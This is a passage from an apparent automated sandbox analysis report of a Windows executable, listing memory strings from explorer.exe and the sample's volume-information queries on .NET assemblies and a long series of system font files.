          Source: explorer.exe, 00000006.00000002.661294806.00000000086C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.425151997.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.653764930.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.425151997.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.653764930.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000006.00000000.425151997.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.653764930.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.425151997.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.653764930.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000002.653229725.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.424757327.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Users\user\Desktop\535276_86376.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
